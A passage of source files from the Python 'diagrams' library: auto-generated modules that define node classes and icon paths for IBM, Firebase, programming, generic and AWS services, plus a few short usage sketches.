ProviderCloudPortalService(_Management): _icon = "provider-cloud-portal-service.png" class PushNotifications(_Management): _icon = "push-notifications.png" class ServiceManagementTools(_Management): _icon = "service-management-tools.png" # Aliases File: diagrams/ibm/blockchain.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _IBM class _Blockchain(_IBM): _type = "blockchain" _icon_dir = "resources/ibm/blockchain" class BlockchainDeveloper(_Blockchain): _icon = "blockchain-developer.png" class Blockchain(_Blockchain): _icon = "blockchain.png" class CertificateAuthority(_Blockchain): _icon = "certificate-authority.png" class ClientApplication(_Blockchain): _icon = "client-application.png" class Communication(_Blockchain): _icon = "communication.png" class Consensus(_Blockchain): _icon = "consensus.png" class EventListener(_Blockchain): _icon = "event-listener.png" class Event(_Blockchain): _icon = "event.png" class ExistingEnterpriseSystems(_Blockchain): _icon = "existing-enterprise-systems.png" class HyperledgerFabric(_Blockchain): _icon = "hyperledger-fabric.png" class KeyManagement(_Blockchain): _icon = "key-management.png" class Ledger(_Blockchain): _icon = "ledger.png" class MembershipServicesProviderApi(_Blockchain): _icon = "membership-services-provider-api.png" class Membership(_Blockchain): _icon = "membership.png" class MessageBus(_Blockchain): _icon = "message-bus.png" class Node(_Blockchain): _icon = "node.png" class Services(_Blockchain): _icon = "services.png" class SmartContract(_Blockchain): _icon = "smart-contract.png" class TransactionManager(_Blockchain): _icon = "transaction-manager.png" class Wallet(_Blockchain): _icon = "wallet.png" # Aliases File: diagrams/ibm/analytics.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Analytics(_IBM): _type = "analytics" _icon_dir = "resources/ibm/analytics" class Analytics(_Analytics): _icon = "analytics.png" class DataIntegration(_Analytics): _icon = "data-integration.png" class DataRepositories(_Analytics): _icon = "data-repositories.png" class DeviceAnalytics(_Analytics): _icon = "device-analytics.png" class StreamingComputing(_Analytics): _icon = "streaming-computing.png" # Aliases File: diagrams/ibm/data.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Data(_IBM): _type = "data" _icon_dir = "resources/ibm/data" class Caches(_Data): _icon = "caches.png" class Cloud(_Data): _icon = "cloud.png" class ConversationTrainedDeployed(_Data): _icon = "conversation-trained-deployed.png" class DataServices(_Data): _icon = "data-services.png" class DataSources(_Data): _icon = "data-sources.png" class DeviceIdentityService(_Data): _icon = "device-identity-service.png" class DeviceRegistry(_Data): _icon = "device-registry.png" class EnterpriseData(_Data): _icon = "enterprise-data.png" class EnterpriseUserDirectory(_Data): _icon = "enterprise-user-directory.png" class FileRepository(_Data): _icon = "file-repository.png" class GroundTruth(_Data): _icon = "ground-truth.png" class Model(_Data): _icon = "model.png" class TmsDataInterface(_Data): _icon = "tms-data-interface.png" # Aliases File: diagrams/ibm/general.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
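# --- Usage sketch (editorial addition, not part of the generated modules) ---
# A tiny example pairing the IBM network nodes with the management/monitoring
# nodes declared above; purely illustrative, with the `Diagram` context
# manager assumed from the top-level diagrams package.
from diagrams import Diagram
from diagrams.ibm.management import AlertNotification, MonitoringMetrics
from diagrams.ibm.network import Gateway, LoadBalancer, Vpc

with Diagram("ibm_network_monitoring", show=False):
    gw = Gateway("gateway")
    lb = LoadBalancer("lb")
    vpc = Vpc("vpc")
    metrics = MonitoringMetrics("metrics")
    alerts = AlertNotification("alerts")

    gw >> lb >> vpc
    vpc >> metrics >> alerts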
import _IBM class _General(_IBM): _type = "general" _icon_dir = "resources/ibm/general" class CloudMessaging(_General): _icon = "cloud-messaging.png" class CloudServices(_General): _icon = "cloud-services.png" class Cloudant(_General): _icon = "cloudant.png" class CognitiveServices(_General): _icon = "cognitive-services.png" class DataSecurity(_General): _icon = "data-security.png" class Enterprise(_General): _icon = "enterprise.png" class GovernanceRiskCompliance(_General): _icon = "governance-risk-compliance.png" class IBMContainers(_General): _icon = "ibm-containers.png" class IBMPublicCloud(_General): _icon = "ibm-public-cloud.png" class IdentityAccessManagement(_General): _icon = "identity-access-management.png" class IdentityProvider(_General): _icon = "identity-provider.png" class InfrastructureSecurity(_General): _icon = "infrastructure-security.png" class Internet(_General): _icon = "internet.png" class IotCloud(_General): _icon = "iot-cloud.png" class MicroservicesApplication(_General): _icon = "microservices-application.png" class MicroservicesMesh(_General): _icon = "microservices-mesh.png" class MonitoringLogging(_General): _icon = "monitoring-logging.png" class Monitoring(_General): _icon = "monitoring.png" class ObjectStorage(_General): _icon = "object-storage.png" class OfflineCapabilities(_General): _icon = "offline-capabilities.png" class Openwhisk(_General): _icon = "openwhisk.png" class PeerCloud(_General): _icon = "peer-cloud.png" class RetrieveRank(_General): _icon = "retrieve-rank.png" class Scalable(_General): _icon = "scalable.png" class ServiceDiscoveryConfiguration(_General): _icon = "service-discovery-configuration.png" class TextToSpeech(_General): _icon = "text-to-speech.png" class TransformationConnectivity(_General): _icon = "transformation-connectivity.png" # Aliases File: diagrams/ibm/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _IBM class _Compute(_IBM): _type = "compute" _icon_dir = "resources/ibm/compute" class BareMetalServer(_Compute): _icon = "bare-metal-server.png" class ImageService(_Compute): _icon = "image-service.png" class Instance(_Compute): _icon = "instance.png" class Key(_Compute): _icon = "key.png" class PowerInstance(_Compute): _icon = "power-instance.png" # Aliases File: diagrams/firebase/extentions.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Firebase class _Extentions(_Firebase): _type = "extentions" _icon_dir = "resources/firebase/extentions" class Extensions(_Extentions): _icon = "extensions.png" # Aliases File: diagrams/firebase/grow.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Firebase class _Grow(_Firebase): _type = "grow" _icon_dir = "resources/firebase/grow" class ABTesting(_Grow): _icon = "ab-testing.png" class AppIndexing(_Grow): _icon = "app-indexing.png" class DynamicLinks(_Grow): _icon = "dynamic-links.png" class InAppMessaging(_Grow): _icon = "in-app-messaging.png" class Invites(_Grow): _icon = "invites.png" class Messaging(_Grow): _icon = "messaging.png" class Predictions(_Grow): _icon = "predictions.png" class RemoteConfig(_Grow): _icon = "remote-config.png" # Aliases FCM = Messaging File: diagrams/firebase/__init__.py """ Firebase provides a set of services for Firebase provider. 
""" from diagrams import Node class _Firebase(Node): _provider = "firebase" _icon_dir = "resources/firebase" fontcolor = "#ffffff" File: diagrams/firebase/develop.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Firebase class _Develop(_Firebase): _type = "develop" _icon_dir = "resources/firebase/develop" class Authentication(_Develop): _icon = "authentication.png" class Firestore(_Develop): _icon = "firestore.png" class Functions(_Develop): _icon = "functions.png" class Hosting(_Develop): _icon = "hosting.png" class MLKit(_Develop): _icon = "ml-kit.png" class RealtimeDatabase(_Develop): _icon = "realtime-database.png" class Storage(_Develop): _icon = "storage.png" # Aliases File: diagrams/firebase/quality.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Firebase class _Quality(_Firebase): _type = "quality" _icon_dir = "resources/firebase/quality" class AppDistribution(_Quality): _icon = "app-distribution.png" class CrashReporting(_Quality): _icon = "crash-reporting.png" class Crashlytics(_Quality): _icon = "crashlytics.png" class PerformanceMonitoring(_Quality): _icon = "performance-monitoring.png" class TestLab(_Quality): _icon = "test-lab.png" # Aliases File: diagrams/firebase/base.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Firebase class _Base(_Firebase): _type = "base" _icon_dir = "resources/firebase/base" class Firebase(_Base): _icon = "firebase.png" # Aliases File: diagrams/programming/framework.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Programming class _Framework(_Programming): _type = "framework" _icon_dir = "resources/programming/framework" class Angular(_Framework): _icon = "angular.png" class Backbone(_Framework): _icon = "backbone.png" class Django(_Framework): _icon = "django.png" class Ember(_Framework): _icon = "ember.png" class Fastapi(_Framework): _icon = "fastapi.png" class Flask(_Framework): _icon = "flask.png" class Flutter(_Framework): _icon = "flutter.png" class Graphql(_Framework): _icon = "graphql.png" class Laravel(_Framework): _icon = "laravel.png" class Micronaut(_Framework): _icon = "micronaut.png" class Quarkus(_Framework): _icon = "quarkus.png" class Rails(_Framework): _icon = "rails.png" class React(_Framework): _icon = "react.png" class Spring(_Framework): _icon = "spring.png" class Starlette(_Framework): _icon = "starlette.png" class Svelte(_Framework): _icon = "svelte.png" class Vue(_Framework): _icon = "vue.png" # Aliases FastAPI = Fastapi GraphQL = Graphql File: diagrams/programming/__init__.py """ Programming provides a set of programming languages and frameworks. """ from diagrams import Node class _Programming(Node): _provider = "programming" _icon_dir = "resources/programming" fontcolor = "#ffffff" File: diagrams/programming/flowchart.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
import _Programming class _Flowchart(_Programming): _type = "flowchart" _icon_dir = "resources/programming/flowchart" class Action(_Flowchart): _icon = "action.png" class Collate(_Flowchart): _icon = "collate.png" class Database(_Flowchart): _icon = "database.png" class Decision(_Flowchart): _icon = "decision.png" class Delay(_Flowchart): _icon = "delay.png" class Display(_Flowchart): _icon = "display.png" class Document(_Flowchart): _icon = "document.png" class InputOutput(_Flowchart): _icon = "input-output.png" class Inspection(_Flowchart): _icon = "inspection.png" class InternalStorage(_Flowchart): _icon = "internal-storage.png" class LoopLimit(_Flowchart): _icon = "loop-limit.png" class ManualInput(_Flowchart): _icon = "manual-input.png" class ManualLoop(_Flowchart): _icon = "manual-loop.png" class Merge(_Flowchart): _icon = "merge.png" class MultipleDocuments(_Flowchart): _icon = "multiple-documents.png" class OffPageConnectorLeft(_Flowchart): _icon = "off-page-connector-left.png" class OffPageConnectorRight(_Flowchart): _icon = "off-page-connector-right.png" class Or(_Flowchart): _icon = "or.png" class PredefinedProcess(_Flowchart): _icon = "predefined-process.png" class Preparation(_Flowchart): _icon = "preparation.png" class Sort(_Flowchart): _icon = "sort.png" class StartEnd(_Flowchart): _icon = "start-end.png" class StoredData(_Flowchart): _icon = "stored-data.png" class SummingJunction(_Flowchart): _icon = "summing-junction.png" # Aliases File: diagrams/programming/runtime.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Programming class _Runtime(_Programming): _type = "runtime" _icon_dir = "resources/programming/runtime" class Dapr(_Runtime): _icon = "dapr.png" # Aliases File: diagrams/programming/language.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Programming class _Language(_Programming): _type = "language" _icon_dir = "resources/programming/language" class Bash(_Language): _icon = "bash.png" class C(_Language): _icon = "c.png" class Cpp(_Language): _icon = "cpp.png" class Csharp(_Language): _icon = "csharp.png" class Dart(_Language): _icon = "dart.png" class Elixir(_Language): _icon = "elixir.png" class Erlang(_Language): _icon = "erlang.png" class Go(_Language): _icon = "go.png" class Java(_Language): _icon = "java.png" class Javascript(_Language): _icon = "javascript.png" class Kotlin(_Language): _icon = "kotlin.png" class Latex(_Language): _icon = "latex.png" class Matlab(_Language): _icon = "matlab.png" class Nodejs(_Language): _icon = "nodejs.png" class Php(_Language): _icon = "php.png" class Python(_Language): _icon = "python.png" class R(_Language): _icon = "r.png" class Ruby(_Language): _icon = "ruby.png" class Rust(_Language): _icon = "rust.png" class Scala(_Language): _icon = "scala.png" class Swift(_Language): _icon = "swift.png" class Typescript(_Language): _icon = "typescript.png" # Aliases JavaScript = Javascript NodeJS = Nodejs PHP = Php TypeScript = Typescript File: diagrams/generic/place.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Generic class _Place(_Generic): _type = "place" _icon_dir = "resources/generic/place" class Datacenter(_Place): _icon = "datacenter.png" # Aliases File: diagrams/generic/device.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
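# --- Usage sketch (editorial addition, not part of the generated modules) ---
# The flowchart nodes above can be composed into a simple flow. The
# `Diagram(..., direction="LR")` keyword and `>>` operator come from the
# top-level diagrams package and are assumptions here, not defined above.
from diagrams import Diagram
from diagrams.programming.flowchart import Action, Decision, InputOutput, StartEnd

with Diagram("request_flow", show=False, direction="LR"):
    start = StartEnd("start")
    read = InputOutput("read request")
    check = Decision("valid?")
    handle = Action("handle")
    end = StartEnd("end")

    start >> read >> check >> handle >> end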
import _Generic class _Device(_Generic): _type = "device" _icon_dir = "resources/generic/device" class Mobile(_Device): _icon = "mobile.png" class Tablet(_Device): _icon = "tablet.png" # Aliases File: diagrams/generic/database.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Generic class _Database(_Generic): _type = "database" _icon_dir = "resources/generic/database" class SQL(_Database): _icon = "sql.png" # Aliases File: diagrams/generic/os.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Generic class _Os(_Generic): _type = "os" _icon_dir = "resources/generic/os" class Android(_Os): _icon = "android.png" class Centos(_Os): _icon = "centos.png" class Debian(_Os): _icon = "debian.png" class IOS(_Os): _icon = "ios.png" class LinuxGeneral(_Os): _icon = "linux-general.png" class Raspbian(_Os): _icon = "raspbian.png" class RedHat(_Os): _icon = "red-hat.png" class Suse(_Os): _icon = "suse.png" class Ubuntu(_Os): _icon = "ubuntu.png" class Windows(_Os): _icon = "windows.png" # Aliases File: diagrams/generic/virtualization.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Generic class _Virtualization(_Generic): _type = "virtualization" _icon_dir = "resources/generic/virtualization" class Qemu(_Virtualization): _icon = "qemu.png" class Virtualbox(_Virtualization): _icon = "virtualbox.png" class Vmware(_Virtualization): _icon = "vmware.png" class XEN(_Virtualization): _icon = "xen.png" # Aliases File: diagrams/generic/__init__.py """ Generic provides the possibility of load an image to be presented as a node. """ from diagrams import Node class _Generic(Node): provider = "generic" _icon_dir = "resources/generic" fontcolor = "#ffffff" File: diagrams/generic/storage.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Generic class _Storage(_Generic): _type = "storage" _icon_dir = "resources/generic/storage" class Storage(_Storage): _icon = "storage.png" # Aliases File: diagrams/generic/network.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Generic class _Network(_Generic): _type = "network" _icon_dir = "resources/generic/network" class Firewall(_Network): _icon = "firewall.png" class Router(_Network): _icon = "router.png" class Subnet(_Network): _icon = "subnet.png" class Switch(_Network): _icon = "switch.png" class VPN(_Network): _icon = "vpn.png" # Aliases File: diagrams/generic/blank.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Generic class _Blank(_Generic): _type = "blank" _icon_dir = "resources/generic/blank" class Blank(_Blank): _icon = "blank.png" # Aliases File: diagrams/generic/compute.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _Generic class _Compute(_Generic): _type = "compute" _icon_dir = "resources/generic/compute" class Rack(_Compute): _icon = "rack.png" # Aliases File: diagrams/aws/enablement.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
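# --- Usage sketch (editorial addition, not part of the generated modules) ---
# A generic on-premises topology built only from the provider-agnostic nodes
# above (device, network, compute, database). Node lists on either side of
# `>>` are assumed to be supported by the top-level diagrams package.
from diagrams import Diagram
from diagrams.generic.compute import Rack
from diagrams.generic.database import SQL
from diagrams.generic.device import Mobile, Tablet
from diagrams.generic.network import Firewall, Router, Switch

with Diagram("onprem_topology", show=False):
    clients = [Mobile("mobile"), Tablet("tablet")]
    fw = Firewall("fw")
    rtr = Router("router")
    sw = Switch("switch")
    app = Rack("app rack")
    db = SQL("db")

    clients >> fw >> rtr >> sw >> app >> db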
import _AWS class _Enablement(_AWS): _type = "enablement" _icon_dir = "resources/aws/enablement" class CustomerEnablement(_Enablement): _icon = "customer-enablement.png" class Iq(_Enablement): _icon = "iq.png" class ManagedServices(_Enablement): _icon = "managed-services.png" class ProfessionalServices(_Enablement): _icon = "professional-services.png" class Support(_Enablement): _icon = "support.png" # Aliases File: diagrams/aws/media.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Media(_AWS): _type = "media" _icon_dir = "resources/aws/media" class ElasticTranscoder(_Media): _icon = "elastic-transcoder.png" class ElementalConductor(_Media): _icon = "elemental-conductor.png" class ElementalDelta(_Media): _icon = "elemental-delta.png" class ElementalLive(_Media): _icon = "elemental-live.png" class ElementalMediaconnect(_Media): _icon = "elemental-mediaconnect.png" class ElementalMediaconvert(_Media): _icon = "elemental-mediaconvert.png" class ElementalMedialive(_Media): _icon = "elemental-medialive.png" class ElementalMediapackage(_Media): _icon = "elemental-mediapackage.png" class ElementalMediastore(_Media): _icon = "elemental-mediastore.png" class ElementalMediatailor(_Media): _icon = "elemental-mediatailor.png" class ElementalServer(_Media): _icon = "elemental-server.png" class KinesisVideoStreams(_Media): _icon = "kinesis-video-streams.png" class MediaServices(_Media): _icon = "media-services.png" # Aliases File: diagrams/aws/enduser.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Enduser(_AWS): _type = "enduser" _icon_dir = "resources/aws/enduser" class Appstream20(_Enduser): _icon = "appstream-2-0.png" class DesktopAndAppStreaming(_Enduser): _icon = "desktop-and-app-streaming.png" class Workdocs(_Enduser): _icon = "workdocs.png" class Worklink(_Enduser): _icon = "worklink.png" class Workspaces(_Enduser): _icon = "workspaces.png" # Aliases File: diagrams/aws/game.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Game(_AWS): _type = "game" _icon_dir = "resources/aws/game" class GameTech(_Game): _icon = "game-tech.png" class Gamelift(_Game): _icon = "gamelift.png" # Aliases File: diagrams/aws/database.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
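# --- Usage sketch (editorial addition, not part of the generated modules) ---
# An illustrative live-video pipeline drawn with the AWS media nodes above;
# the chain is only meant to show how the classes are instantiated and linked,
# with `diagrams.Diagram` assumed from the top-level package.
from diagrams import Diagram
from diagrams.aws.media import (
    ElementalMedialive,
    ElementalMediapackage,
    ElementalMediastore,
)

with Diagram("live_video", show=False):
    live = ElementalMedialive("encode")
    package = ElementalMediapackage("package")
    store = ElementalMediastore("origin")

    live >> package >> store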
import _AWS class _Database(_AWS): _type = "database" _icon_dir = "resources/aws/database" class AuroraInstance(_Database): _icon = "aurora-instance.png" class Aurora(_Database): _icon = "aurora.png" class DatabaseMigrationServiceDatabaseMigrationWorkflow(_Database): _icon = "database-migration-service-database-migration-workflow.png" class DatabaseMigrationService(_Database): _icon = "database-migration-service.png" class Database(_Database): _icon = "database.png" class DocumentdbMongodbCompatibility(_Database): _icon = "documentdb-mongodb-compatibility.png" class DynamodbAttribute(_Database): _icon = "dynamodb-attribute.png" class DynamodbAttributes(_Database): _icon = "dynamodb-attributes.png" class DynamodbDax(_Database): _icon = "dynamodb-dax.png" class DynamodbGlobalSecondaryIndex(_Database): _icon = "dynamodb-global-secondary-index.png" class DynamodbItem(_Database): _icon = "dynamodb-item.png" class DynamodbItems(_Database): _icon = "dynamodb-items.png" class DynamodbTable(_Database): _icon = "dynamodb-table.png" class Dynamodb(_Database): _icon = "dynamodb.png" class ElasticacheCacheNode(_Database): _icon = "elasticache-cache-node.png" class ElasticacheForMemcached(_Database): _icon = "elasticache-for-memcached.png" class ElasticacheForRedis(_Database): _icon = "elasticache-for-redis.png" class Elasticache(_Database): _icon = "elasticache.png" class KeyspacesManagedApacheCassandraService(_Database): _icon = "keyspaces-managed-apache-cassandra-service.png" class Neptune(_Database): _icon = "neptune.png" class QuantumLedgerDatabaseQldb(_Database): _icon = "quantum-ledger-database-qldb.png" class RDSInstance(_Database): _icon = "rds-instance.png" class RDSMariadbInstance(_Database): _icon = "rds-mariadb-instance.png" class RDSMysqlInstance(_Database): _icon = "rds-mysql-instance.png" class RDSOnVmware(_Database): _icon = "rds-on-vmware.png" class RDSOracleInstance(_Database): _icon = "rds-oracle-instance.png" class RDSPostgresqlInstance(_Database): _icon = "rds-postgresql-instance.png" class RDSSqlServerInstance(_Database): _icon = "rds-sql-server-instance.png" class RDS(_Database): _icon = "rds.png" class RedshiftDenseComputeNode(_Database): _icon = "redshift-dense-compute-node.png" class RedshiftDenseStorageNode(_Database): _icon = "redshift-dense-storage-node.png" class Redshift(_Database): _icon = "redshift.png" class Timestream(_Database): _icon = "timestream.png" # Aliases DMS = DatabaseMigrationService DocumentDB = DocumentdbMongodbCompatibility DAX = DynamodbDax DynamodbGSI = DynamodbGlobalSecondaryIndex DB = Database DDB = Dynamodb ElastiCache = Elasticache QLDB = QuantumLedgerDatabaseQldb File: diagrams/aws/security.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
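# --- Usage sketch (editorial addition, not part of the generated modules) ---
# A small data-tier diagram using the AWS database classes and aliases above
# (RDS, RDSMysqlInstance, ElastiCache, DDB, DAX). The `>>` and `-` edge
# operators are assumed from the top-level diagrams package.
from diagrams import Diagram
from diagrams.aws.database import DAX, DDB, RDS, ElastiCache, RDSMysqlInstance

with Diagram("aws_data_tier", show=False):
    primary = RDS("primary")
    replicas = [RDSMysqlInstance("replica-1"), RDSMysqlInstance("replica-2")]
    cache = ElastiCache("cache")
    sessions = DDB("sessions")
    accel = DAX("dax")

    # Primary fans out to read replicas; DAX fronts the DynamoDB table; the
    # cache sits alongside the primary (undirected edge).
    primary >> replicas
    accel >> sessions
    primary - cache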
import _AWS class _Security(_AWS): _type = "security" _icon_dir = "resources/aws/security" class AdConnector(_Security): _icon = "ad-connector.png" class Artifact(_Security): _icon = "artifact.png" class CertificateAuthority(_Security): _icon = "certificate-authority.png" class CertificateManager(_Security): _icon = "certificate-manager.png" class CloudDirectory(_Security): _icon = "cloud-directory.png" class Cloudhsm(_Security): _icon = "cloudhsm.png" class Cognito(_Security): _icon = "cognito.png" class Detective(_Security): _icon = "detective.png" class DirectoryService(_Security): _icon = "directory-service.png" class FirewallManager(_Security): _icon = "firewall-manager.png" class Guardduty(_Security): _icon = "guardduty.png" class IdentityAndAccessManagementIamAccessAnalyzer(_Security): _icon = "identity-and-access-management-iam-access-analyzer.png" class IdentityAndAccessManagementIamAddOn(_Security): _icon = "identity-and-access-management-iam-add-on.png" class IdentityAndAccessManagementIamAWSStsAlternate(_Security): _icon = "identity-and-access-management-iam-aws-sts-alternate.png" class IdentityAndAccessManagementIamAWSSts(_Security): _icon = "identity-and-access-management-iam-aws-sts.png" class IdentityAndAccessManagementIamDataEncryptionKey(_Security): _icon = "identity-and-access-management-iam-data-encryption-key.png" class IdentityAndAccessManagementIamEncryptedData(_Security): _icon = "identity-and-access-management-iam-encrypted-data.png" class IdentityAndAccessManagementIamLongTermSecurityCredential(_Security): _icon = "identity-and-access-management-iam-long-term-security-credential.png" class IdentityAndAccessManagementIamMfaToken(_Security): _icon = "identity-and-access-management-iam-mfa-token.png" class IdentityAndAccessManagementIamPermissions(_Security): _icon = "identity-and-access-management-iam-permissions.png" class IdentityAndAccessManagementIamRole(_Security): _icon = "identity-and-access-management-iam-role.png" class IdentityAndAccessManagementIamTemporarySecurityCredential(_Security): _icon = "identity-and-access-management-iam-temporary-security-credential.png" class IdentityAndAccessManagementIam(_Security): _icon = "identity-and-access-management-iam.png" class InspectorAgent(_Security): _icon = "inspector-agent.png" class Inspector(_Security): _icon = "inspector.png" class KeyManagementService(_Security): _icon = "key-management-service.png" class Macie(_Security): _icon = "macie.png" class ManagedMicrosoftAd(_Security): _icon = "managed-microsoft-ad.png" class ResourceAccessManager(_Security): _icon = "resource-access-manager.png" class SecretsManager(_Security): _icon = "secrets-manager.png" class SecurityHubFinding(_Security): _icon = "security-hub-finding.png" class SecurityHub(_Security): _icon = "security-hub.png" class SecurityIdentityAndCompliance(_Security): _icon = "security-identity-and-compliance.png" class ShieldAdvanced(_Security): _icon = "shield-advanced.png" class Shield(_Security): _icon = "shield.png" class SimpleAd(_Security): _icon = "simple-ad.png" class SingleSignOn(_Security): _icon = "single-sign-on.png" class WAFFilteringRule(_Security): _icon = "waf-filtering-rule.png" class WAF(_Security): _icon = "waf.png" # Aliases ACM = CertificateManager CloudHSM = Cloudhsm DS = DirectoryService FMS = FirewallManager IAMAccessAnalyzer = IdentityAndAccessManagementIamAccessAnalyzer IAMAWSSts = IdentityAndAccessManagementIamAWSSts IAMPermissions = IdentityAndAccessManagementIamPermissions IAMRole = IdentityAndAccessManagementIamRole IAM 
= IdentityAndAccessManagementIam KMS = KeyManagementService RAM = ResourceAccessManager File: diagrams/aws/satellite.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Satellite(_AWS): _type = "satellite" _icon_dir = "resources/aws/satellite" class GroundStation(_Satellite): _icon = "ground-station.png" class Satellite(_Satellite): _icon = "satellite.png" # Aliases File: diagrams/aws/mobile.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Mobile(_AWS): _type = "mobile" _icon_dir = "resources/aws/mobile" class Amplify(_Mobile): _icon = "amplify.png" class APIGatewayEndpoint(_Mobile): _icon = "api-gateway-endpoint.png" class APIGateway(_Mobile): _icon = "api-gateway.png" class Appsync(_Mobile): _icon = "appsync.png" class DeviceFarm(_Mobile): _icon = "device-farm.png" class Mobile(_Mobile): _icon = "mobile.png" class Pinpoint(_Mobile): _icon = "pinpoint.png" # Aliases File: diagrams/aws/robotics.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . import _AWS class _Robotics(_AWS): _type = "robotics" _icon_dir = "resources/aws/robotics" class RobomakerCloudExtensionRos(_Robotics): _icon = "robomaker-cloud-extension-ros.png" class RobomakerDevelopmentEnvironment(_Robotics): _icon = "robomaker-development-environment.png" class RobomakerFleetManagement(_Robotics): _icon = "robomaker-fleet-management.png" class RobomakerSimulator(_Robotics): _icon = "robomaker-simulator.png" class Robomaker(_Robotics): _icon = "robomaker.png" class Robotics(_Robotics): _icon = "robotics.png" # Aliases File: diagrams/aws/__init__.py """ AWS provides a set of services for Amazon Web Service provider. """ from diagrams import Node class _AWS(Node): _provider = "aws" _icon_dir = "resources/aws" fontcolor = "#ffffff" File: diagrams/aws/integration.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
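# --- Usage sketch (editorial addition, not part of the generated modules) ---
# A minimal security-controls diagram using the AWS security aliases defined
# above (WAF, Cognito, IAM, SecretsManager, KMS). Layout semantics are
# illustrative; `diagrams.Diagram` is assumed from the top-level package.
from diagrams import Diagram
from diagrams.aws.security import IAM, KMS, WAF, Cognito, SecretsManager

with Diagram("aws_security_controls", show=False):
    waf = WAF("waf")
    userpool = Cognito("user pool")
    roles = IAM("roles")
    secrets = SecretsManager("secrets")
    keys = KMS("kms")

    waf >> userpool >> roles
    roles >> secrets >> keys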
import _AWS class _Integration(_AWS): _type = "integration" _icon_dir = "resources/aws/integration" class ApplicationIntegration(_Integration): _icon = "application-integration.png" class Appsync(_Integration): _icon = "appsync.png" class ConsoleMobileApplication(_Integration): _icon = "console-mobile-application.png" class EventResource(_Integration): _icon = "event-resource.png" class EventbridgeCustomEventBusResource(_Integration): _icon = "eventbridge-custom-event-bus-resource.png" class EventbridgeDefaultEventBusResource(_Integration): _icon = "eventbridge-default-event-bus-resource.png" class EventbridgeSaasPartnerEventBusResource(_Integration): _icon = "eventbridge-saas-partner-event-bus-resource.png" class Eventbridge(_Integration): _icon = "eventbridge.png" class ExpressWorkflows(_Integration): _icon = "express-workflows.png" class MQ(_Integration): _icon = "mq.png" class SimpleNotificationServiceSnsEmailNotification(_Integration): _icon = "simple-notification-service-sns-email-notification.png" class SimpleNotificationServiceSnsHttpNotification(_Integration): _icon = "simple-notification-service-sns-http-notification.png" class SimpleNotificationServiceSnsTopic(_Integration): _icon = "simple-notification-service-sns-topic.png" class SimpleNotificationServiceSns(_Integration): _icon = "simple-notification-service-sns.png" class SimpleQueueServiceSqsMessage(_Integration): _icon = "simple-queue-service-sqs-message.png" class SimpleQueueServiceSqsQueue(_Integration): _icon = "simple-queue-service-sqs-queue.png" class SimpleQueueServiceSqs(_Integration): _icon = "simple-queue-service-sqs.png" class StepFunctions(_Integration): _icon = "step-functions.png" # Aliases SNS = SimpleNotificationServiceSns SQS = SimpleQueueServiceSqs SF = StepFunctions File: diagrams/aws/ml.py # This module is automatically generated by autogen.sh. DO NOT EDIT. from . 
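# --- Usage sketch (editorial addition, not part of the generated modules) ---
# An event fan-out pattern using the AWS integration nodes above
# (Eventbridge, SNS, SQS, StepFunctions). Connecting a node to a list and a
# list to a node with `>>` is assumed from the top-level diagrams package.
from diagrams import Diagram
from diagrams.aws.integration import SNS, SQS, Eventbridge, StepFunctions

with Diagram("event_fanout", show=False):
    bus = Eventbridge("event bus")
    topic = SNS("fanout")
    queues = [SQS("orders"), SQS("billing")]
    workflow = StepFunctions("fulfilment")

    bus >> topic >> queues >> workflow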
import _AWS class _ML(_AWS): _type = "ml" _icon_dir = "resources/aws/ml" class ApacheMxnetOnAWS(_ML): _icon = "apache-mxnet-on-aws.png" class AugmentedAi(_ML): _icon = "augmented-ai.png" class Comprehend(_ML): _icon = "comprehend.png" class DeepLearningAmis(_ML): _icon = "deep-learning-amis.png" class DeepLearningContainers(_ML): _icon = "deep-learning-containers.png" class Deepcomposer(_ML): _icon = "deepcomposer.png" class Deeplens(_ML): _icon = "deeplens.png" class Deepracer(_ML): _icon = "deepracer.png" class ElasticInference(_ML): _icon = "elastic-inference.png" class Forecast(_ML): _icon = "forecast.png" class FraudDetector(_ML): _icon = "fraud-detector.png" class Kendra(_ML): _icon = "kendra.png" class Lex(_ML): _icon = "lex.png" class MachineLearning(_ML): _icon = "machine-learning.png" class Personalize(_ML): _icon = "personalize.png" class Polly(_ML): _icon = "polly.png" class RekognitionImage(_ML): _icon = "rekognition-image.png" class RekognitionVideo(_ML): _icon = "rekognition-video.png" class Rekognition(_ML): _icon = "rekognition.png" class SagemakerGroundTruth(_ML): _icon = "sagemaker-ground-truth.png" class SagemakerModel(_ML): _icon = "sagemaker-model.png" class SagemakerNotebook(_ML): _icon = "sagemaker-notebook.png" class SagemakerTrainingJob(_ML): _icon = "sagemaker-training-job.png" class Sagemaker(_ML): _icon = 